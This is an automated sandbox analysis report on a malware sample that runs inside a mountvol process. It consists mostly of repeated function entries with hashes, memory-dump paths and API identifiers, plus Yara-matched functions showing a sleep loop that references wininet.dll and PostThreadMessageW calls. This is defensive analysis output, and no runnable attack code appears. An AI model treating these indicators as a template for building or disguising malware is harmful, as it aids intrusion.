                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b6c4bf94118e6b2ab4543e3534b4f38d1b027bdf28c75390f099331709b6bed0
                                                                                        • Instruction ID: 97c1d2e4d7a1d34c4f0437d3fa0a0431553e48d52864264f3345047a9862aa0c
                                                                                        • Opcode Fuzzy Hash: b6c4bf94118e6b2ab4543e3534b4f38d1b027bdf28c75390f099331709b6bed0
                                                                                        • Instruction Fuzzy Hash: 31900435311404030505F75C07045071057C7DF351355D031F101F550CD731CD757131
                                                                                        Function 03122AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7ced6fcde2159cec5efd6697e234cadcdab6d09a43bbf27a4e738a5f2f66e263
                                                                                        • Instruction ID: 5a38659a857b8d042ae7377a7f425e41e6d53bec674fe3d04794761e7335e51d
                                                                                        • Opcode Fuzzy Hash: 7ced6fcde2159cec5efd6697e234cadcdab6d09a43bbf27a4e738a5f2f66e263
                                                                                        • Instruction Fuzzy Hash: 2A900225221404030545F658070450B145597DB351395D015F141B590CC72189696321
                                                                                        Function 03122F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c5575a81336e985f8f8c39aca16eae48a3d7541e18fa98a8fadbb32f965e2ff5
                                                                                        • Instruction ID: f8156f7aa99e82b7bdca2c4041d6eeabdd145618368c7ae7772559dab75d04b3
                                                                                        • Opcode Fuzzy Hash: c5575a81336e985f8f8c39aca16eae48a3d7541e18fa98a8fadbb32f965e2ff5
                                                                                        • Instruction Fuzzy Hash: FA90026134140843D500B2584514B061015C7E6301F55D015F1069554D8719CD567126
                                                                                        Function 03122FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 835f40c7e7b7763ab2c5f7ada43634d4e13d09ab0aed1bbaebda76f51d3e3e59
                                                                                        • Instruction ID: e12062c744b0c89dde9c3166ebeabb027dd03e5ab142abe18e416aa22a0377be
                                                                                        • Opcode Fuzzy Hash: 835f40c7e7b7763ab2c5f7ada43634d4e13d09ab0aed1bbaebda76f51d3e3e59
                                                                                        • Instruction Fuzzy Hash: CD900221601404434540B26889449065015ABE6211755D121B099D550D875989696665
                                                                                        Function 03122FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3198d62267e11037b36df035cb91bf3a165582d945d4471d8db412e823500be5
                                                                                        • Instruction ID: 9f476a277984ec16e252119b197a68a8328369cc0850f6dd279923be9ffc7b1a
                                                                                        • Opcode Fuzzy Hash: 3198d62267e11037b36df035cb91bf3a165582d945d4471d8db412e823500be5
                                                                                        • Instruction Fuzzy Hash: 2A900221211C0443D600B6684D14B07101587D5303F55D115B0159554CCB1589656521
                                                                                        Function 03122E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c796e819a3cc825a561567618e02b5965b869d0ef7437528e38c87b5ffa3ec87
                                                                                        • Instruction ID: 7747e8cd619e6b3271d423fdfa0b6b603ea4167fdc3cbe7b4b625de106e52486
                                                                                        • Opcode Fuzzy Hash: c796e819a3cc825a561567618e02b5965b869d0ef7437528e38c87b5ffa3ec87
                                                                                        • Instruction Fuzzy Hash: 0D90022160140903D501B2584504616101A87D5241F95D022B1029555ECB258A96B131
                                                                                        Function 03122EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0f94573fc9adb54cdf5c2c616e3dbe3960ab823f5e660f2ac493e2627cfca7ac
                                                                                        • Instruction ID: cf3163d3f4af7f49e1ea0279a4fa4a3dbd63523ed373a4d02b4641894c2e224c
                                                                                        • Opcode Fuzzy Hash: 0f94573fc9adb54cdf5c2c616e3dbe3960ab823f5e660f2ac493e2627cfca7ac
                                                                                        • Instruction Fuzzy Hash: 6290026120180803D540B6584904607101587D5302F55D011B2069555E8B298D557135
                                                                                        Function 03122D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d65e1a39059c547c92837e179f9a919db84821a4569e9fd415186219690dd396
                                                                                        • Instruction ID: fc62408aa6bcae35cc78a11cd852e7a097091ea3fd4c2417320655679fc36e05
                                                                                        • Opcode Fuzzy Hash: d65e1a39059c547c92837e179f9a919db84821a4569e9fd415186219690dd396
                                                                                        • Instruction Fuzzy Hash: 3090022921340403D580B258550860A101587D6202F95E415B001A558CCB15896D6321
                                                                                        Function 03122D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d99bd267bf0dee95029cffb8c20d9e28ccfc6c123f3f2a0c351041a3144c769f
                                                                                        • Instruction ID: 8920801b42da6f0d00906f8568742aab0c79e1a3e8aa0b7b99ff6865de542ffb
                                                                                        • Opcode Fuzzy Hash: d99bd267bf0dee95029cffb8c20d9e28ccfc6c123f3f2a0c351041a3144c769f
                                                                                        • Instruction Fuzzy Hash: 3D90022130140403D540B25855186065015D7E6301F55E011F0419554CDB15895A6222
                                                                                        Function 03122DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 17691f136242a9113fb45339414eb98ef49eb2414c3cec02d03abfb2b8c36f46
                                                                                        • Instruction ID: 8c19bdca990487b88cce45f0dfb4412e22117d58dd8a2ecd3fab36b435ebb8d5
                                                                                        • Opcode Fuzzy Hash: 17691f136242a9113fb45339414eb98ef49eb2414c3cec02d03abfb2b8c36f46
                                                                                        • Instruction Fuzzy Hash: 1A900221242445535945F2584504507501697E5241795D012B1419950C8726995AE621
                                                                                        Function 03122DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d116163865ca1fe5914af3b05531e4de1187555605dc8176544e4c32c3c1f039
                                                                                        • Instruction ID: 31724100e4b0e05d53a3787698caab2f9a3dd94fd78730053cd55ce883b22b79
                                                                                        • Opcode Fuzzy Hash: d116163865ca1fe5914af3b05531e4de1187555605dc8176544e4c32c3c1f039
                                                                                        • Instruction Fuzzy Hash: 0F90023120140813D511B2584604707101987D5241F95D412B0429558D97568A56B121
                                                                                        Function 03122C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 04910f3b8b0a84725bbce8ce3de662c92d145309c6bda9235965427c3160d66b
                                                                                        • Instruction ID: 5209f336cbc2ecb2b6463cec04cebfb307fd85b7ebb32669391a5b8aa9f65790
                                                                                        • Opcode Fuzzy Hash: 04910f3b8b0a84725bbce8ce3de662c92d145309c6bda9235965427c3160d66b
                                                                                        • Instruction Fuzzy Hash: E390023120148C03D510B258850474A101587D5301F59D411B4429658D879589957121
                                                                                        Function 03122C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6f554659ac5568b9c2d75d2acca6eece146c0b6b5b9928330bb24a7dcc5e90eb
                                                                                        • Instruction ID: 9b2838ba7f7785d0f28a5986e5ebe326d08643b803b5dee164d162ee3d0e710f
                                                                                        • Opcode Fuzzy Hash: 6f554659ac5568b9c2d75d2acca6eece146c0b6b5b9928330bb24a7dcc5e90eb
                                                                                        • Instruction Fuzzy Hash: 9D90023120140C43D500B2584504B46101587E5301F55D016B0129654D8715C9557521
                                                                                        Function 03122CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 104c1855ba64dca3f7ff8fc1f132c4ca6cbb4e855d04af7285cf4fc6cb156193
                                                                                        • Instruction ID: 10256119a91f9f644213531aadd5fc57a61f1cee4883c2e3e246f1117cb4309a
                                                                                        • Opcode Fuzzy Hash: 104c1855ba64dca3f7ff8fc1f132c4ca6cbb4e855d04af7285cf4fc6cb156193
                                                                                        • Instruction Fuzzy Hash: DD90023120140803D500B6985508646101587E5301F55E011B5029555EC76589957131
                                                                                        Function 031235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 611236177c27cd98a1952070cc6a7c1b7df5bcc6cef68b4cb722bed1e1f03fe3
                                                                                        • Instruction ID: 7dab69066711858deb6f98cc50be323e33e6734a8c129fca412619e6d049c625
                                                                                        • Opcode Fuzzy Hash: 611236177c27cd98a1952070cc6a7c1b7df5bcc6cef68b4cb722bed1e1f03fe3
                                                                                        • Instruction Fuzzy Hash: 9690023160550803D500B2584614706201587D5201F65D411B0429568D87958A5575A2
                                                                                        Function 031239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 20c769040ddfa8edf8f570aa41719d16572a428c5b36faaeb64d4ed25c6b3879
                                                                                        • Instruction ID: 39b0a62bbf8874aa05380c2b90b2cf3fde435c91d8decc5f5376da3c9428769f
                                                                                        • Opcode Fuzzy Hash: 20c769040ddfa8edf8f570aa41719d16572a428c5b36faaeb64d4ed25c6b3879
                                                                                        • Instruction Fuzzy Hash: 4090022124545503D550B25C45046165015A7E5201F55D021B0819594D875589597221
                                                                                        Function 02A43D30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 447 2a43d30-2a43d78 call 2a4b7c0 450 2a43e84-2a43e8a 447->450 451 2a43d7e-2a43df8 call 2a4b8a0 call 2a347a0 call 2a213e0 call 2a41f00 447->451 460 2a43e00-2a43e14 Sleep 451->460 461 2a43e75-2a43e7c 460->461 462 2a43e16-2a43e28 460->462 461->460 465 2a43e7e 461->465 463 2a43e4a-2a43e63 call 2a46290 462->463 464 2a43e2a-2a43e48 call 2a461f0 462->464 469 2a43e68-2a43e6b 463->469 464->469 465->450 469->461
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02A43E0B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: PCF`$net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-2541284691
                                                                                        • Opcode ID: be9b7b8454c07fb5ab589a22d0b3e4e98d1e9e15556487143f6e73ec081bf435
                                                                                        • Instruction ID: bc995b4f5d3f69b25945d8ebfa511838fd5902cfa4d6253205d940ee5290e7f5
                                                                                        • Opcode Fuzzy Hash: be9b7b8454c07fb5ab589a22d0b3e4e98d1e9e15556487143f6e73ec081bf435
                                                                                        • Instruction Fuzzy Hash: 343193B1A41205BFDB14DFA4C984FEBB7B9EB84704F10456DEA1D6B240DB70AA41CFA4
                                                                                        Function 02A30E48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 470 2a30e48-2a30e72 472 2a30e74 470->472 473 2a30ebe-2a30ef9 470->473 472->473 477 2a30f15-2a30f30 473->477 478 2a30efb 473->478 483 2a30f32-2a30f43 477->483 484 2a30f6f-2a30f71 477->484 480 2a30f03 478->480 481 2a30efd-2a30f02 478->481 482 2a30f04-2a30f06 480->482 481->482 485 2a30f79-2a30f80 481->485 490 2a30f08 482->490 491 2a30f5e 482->491 486 2a30f81 483->486 487 2a30f45-2a30f47 483->487 488 2a30f96-2a3100e call 2a4b8f0 call 2a4c300 call 2a347a0 call 2a213e0 call 2a41f00 484->488 489 2a30f74 484->489 485->486 492 2a30f91 486->492 487->491 505 2a31030-2a31035 488->505 506 2a31010-2a31021 PostThreadMessageW 488->506 489->492 493 2a30f76 489->493 493->485 506->505 507 2a31023-2a3102d 506->507 507->505
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 0-2720052585
                                                                                        • Opcode ID: c7f0e158a60a8482a1386cc0a35d7e8b294f512bd0064633ffc00473cfb059c8
                                                                                        • Instruction ID: 0a37f6a891cbce22c01ea47a6e30061fa8139afcc8d33ce0dcc9b0d95ebfa243
                                                                                        • Opcode Fuzzy Hash: c7f0e158a60a8482a1386cc0a35d7e8b294f512bd0064633ffc00473cfb059c8
                                                                                        • Instruction Fuzzy Hash: BF41BD35A00348ABC7229F68CC41BDEBF78EF85760F1441DAF544AB282DB719946CBE5
                                                                                        Function 02A30F5F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 508 2a30f5f-2a30f72 509 2a30f96-2a3100e call 2a4b8f0 call 2a4c300 call 2a347a0 call 2a213e0 call 2a41f00 508->509 510 2a30f74 508->510 526 2a31030-2a31035 509->526 527 2a31010-2a31021 PostThreadMessageW 509->527 511 2a30f91 510->511 512 2a30f76-2a30f81 510->512 512->511 527->526 528 2a31023-2a3102d 527->528 528->526
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 02A3101D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: aefb0618ea6ddd378aafc290b4ee4b8a04458ff5f97e032c069a9bfbf668c530
                                                                                        • Instruction ID: 7b95be8915982df66a8f656d6eccd2e900254e06a6c64b79107cf7d7d91227ae
                                                                                        • Opcode Fuzzy Hash: aefb0618ea6ddd378aafc290b4ee4b8a04458ff5f97e032c069a9bfbf668c530
                                                                                        • Instruction Fuzzy Hash: 66210531D403487BDB21AFA48D45F9FBF799F41B50F0440A5FA447B181DB74A6068BE6
                                                                                        Function 02A30F92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 02A3101D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: f2fa8528c8f6790cb206864bd82a578688acf55823e3ee9a82a07b0758d42055
                                                                                        • Instruction ID: c73391794ee38373bc1f8a8c02249fc46df258baf9127e9f2fa9e194270b2cd9
                                                                                        • Opcode Fuzzy Hash: f2fa8528c8f6790cb206864bd82a578688acf55823e3ee9a82a07b0758d42055
                                                                                        • Instruction Fuzzy Hash: BF11C631D4135876EB219BE48D42FDF7B799F41B94F044055FA047B280DBB4A6068BE6
                                                                                        Function 02A30FA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 02A3101D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 465016eab324623648abcdd6f0ec632a6e54e7ba0c4f32c1fd28321f11e27b1e
                                                                                        • Instruction ID: 60079da35f3ce07def8d1aa35e0556380befe83a44f412d35a5dd5618b5c024e
                                                                                        • Opcode Fuzzy Hash: 465016eab324623648abcdd6f0ec632a6e54e7ba0c4f32c1fd28321f11e27b1e
